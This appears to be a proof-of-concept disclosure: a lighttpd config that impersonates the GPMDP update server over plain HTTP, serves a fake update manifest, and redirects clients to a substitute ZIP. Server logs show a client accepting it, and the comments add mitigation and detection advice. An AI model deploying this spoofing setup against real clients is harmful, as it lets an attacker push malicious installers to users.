GPMDP update server spoofing
# lighttpd virtual host that answers for the GPMDP update hostname.
# Matching is on the plain-HTTP Host header only: there is no TLS block in
# this config and the update-host URLs used below (download redirect, and the
# "url" field in fake.json) are http://, so whoever controls name resolution
# for this host on the client's network path can stand in for the real server.
$HTTP["host"] =~ "update.googleplaymusicdesktopplayer.com" { | |
server.document-root = "/var/www/hosts/gpmdp/" | |
# Every /update/osx/<version> poll is answered with fake.json (200, 247 bytes
# in the log below). document-root is pointed at a file rather than a
# directory; presumably lighttpd treats the remaining path components as
# path_info and returns the file for any version string -- confirm against the
# lighttpd version in use, this is not standard use of the directive.
$HTTP["url"] =~ "^/update/osx/"{ | |
server.document-root = "/var/www/hosts/gpmdp/fake.json" | |
} | |
# "/" is answered with a 302 to the Windows installer to mirror what the real
# server does (see the first log line below), so the client's initial poll
# looks the same as against upstream.
$HTTP["url"] == "/"{ | |
url.redirect-code = 302 | |
url.redirect = ( | |
"" => "https://github.com/MarshallOfSound/Google-Play-Music-Desktop-Player-UNOFFICIAL-/releases/download/3.0.1/Google.Play.Music.Desktop.Player.x86.exe" | |
) | |
} | |
# The "url" field in fake.json sends the client here; it is redirected to the
# payload ZIP on the same unauthenticated hostname, over plain HTTP.
$HTTP["url"] =~ "^/download/version/"{ | |
url.redirect-code = 302 | |
url.redirect = ( | |
"" => "http://update.googleplaymusicdesktopplayer.com/download/Google.Play.Music.Desktop.Player.OSX.zip" | |
) | |
} | |
} | |
# What the log below demonstrates: a 3.0.1 client accepts a manifest naming
# 3.0.7 and then fetches a ~50 MB payload from whichever host answers for this
# name over plain HTTP. Nothing in the exchange authenticates the server (no
# TLS), and there is no sign of the client checking a signature on the
# manifest or the ZIP before fetching it; whether it verifies anything before
# installing is not visible from these lines.
# Mitigation on the client side: fetch manifest and payload over HTTPS with
# certificate validation, and verify a publisher signature (or a hash carried
# in a signed manifest) on the payload before applying it.
# Detection: plaintext HTTP update traffic to this host, or the host resolving
# to an unexpected address, is the observable on the client network.
# Client behavior when connecting to malicious update server (from lighttpd log): | |
# Poll root directory of update server (we serve a 302 to windows .exe to imitate the real server) | |
# 192.168.0.4 update.googleplaymusicdesktopplayer.com - [13/Mar/2016:19:10:31 -0400] "GET / HTTP/1.1" 302 0 "-" "-" | |
# GPMDP loads JSON file from fake update server | |
# 192.168.0.4 update.googleplaymusicdesktopplayer.com - [13/Mar/2016:19:10:31 -0400] "GET /update/osx/3.0.1 HTTP/1.1" 200 247 "-" "Google%20Play%20Music%20Desktop%20Player/3.0.1 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)" | |
# GPMDP parses our fake update file and follows our "evil" link :^) | |
# 192.168.0.4 update.googleplaymusicdesktopplayer.com - [13/Mar/2016:19:10:31 -0400] "GET /download/version/3.0.7/osx_64?filetype=zip HTTP/1.1" 302 0 "-" "Google%20Play%20Music%20Desktop%20Player/3.0.1 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)" | |
# GPMDP downloads the "latest" fake version from our update server! | |
# 192.168.0.4 update.googleplaymusicdesktopplayer.com - [13/Mar/2016:19:10:36 -0400] "GET /download/Google.Play.Music.Desktop.Player.OSX.zip HTTP/1.1" 200 50647108 "-" "Google%20Play%20Music%20Desktop%20Player/3.0.1 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)" | |
# Contents of fake.json: | |
# (the client apparently compares "name" against its own version and, seeing
# a higher one, requests "url" -- see the third log line above)
# { | |
# "url":"http://update.googleplaymusicdesktopplayer.com/download/version/3.0.7/osx_64?filetype=zip", | |
# "name":"3.0.7", | |
# "notes":"This is a fake release of GPMDP that contains malicious content!", | |
# "pub_date":"2016-03-12T02:53:45.000Z" | |
# } | |
# Update file ZIP was just the latest version of GPMDP. |